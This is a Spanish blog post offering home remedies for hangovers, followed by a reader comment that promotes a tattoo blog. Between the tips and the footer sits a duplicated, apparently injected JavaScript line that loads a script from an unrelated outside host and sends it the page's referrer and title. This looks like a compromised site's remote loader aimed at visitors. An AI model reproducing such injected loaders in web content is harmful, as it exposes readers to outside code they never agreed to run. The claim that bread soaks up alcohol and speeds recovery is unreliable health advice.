Salud y belleza » Salud

No beber…y otras soluciones contra la resaca

1 Comentario

Bajo ningún caso, el próximo artículo intenta elevarse como un panegírico del alcoholismo. Nada más alejado de eso: el ejercicio de beber debe realizarse, siempre, de forma responsable (como beber sano). Sucede que, amén de cualquier advertencia, todavía habitan por aquí varios irresponsables. Y, ¿qué hacer con ellos? ¿Dejarlos a la deriva? No señor. Ante todo, recomendarlos cuidarse con las dosis. Pero eso, para la próxima vez. Mientras tanto, algunas curas para la resaca…

Soluciones para curar la resaca

  • Comer mucho pan. Esta clase de alimento ayuda a absorber el alcohol cual si se tratara de una esponja. Así, los síntomas desaparerán más rápido.
  • Beber mucha agua. Es la mejor receta para desintoxicarse tras una jornada de excesos. Si se bebió mucho alcohol, y mientras se reflexiona sobre los peligros de esa conducta, es útil ingerir aproximadamente dos litros de agua (en medidas pequeñas para no forzar el sistema digestivo).
  • Consumir alguna fruta (especialmente peras o manzanas) ayuda a calmar los problemas digestivos relacionados con el consumo de alcohol.
  • Pero, claro, ninguna solución es tan simple como…no beber.

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

One Comment »

  • Florencia said:

    Obviamente que la solucion mas simple, rapida y efectiva es NO beber, pero eso no va a pasar, las personas y mas los adolescentes beben sin control hoy en dia, la verdad muy buenos los consejos, no los sabia.
    Te queria invitar ademas que pases por mi blog de Tatuajes estatuajes.com, mira las fotos que quieras!
    Muchas Gracias.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.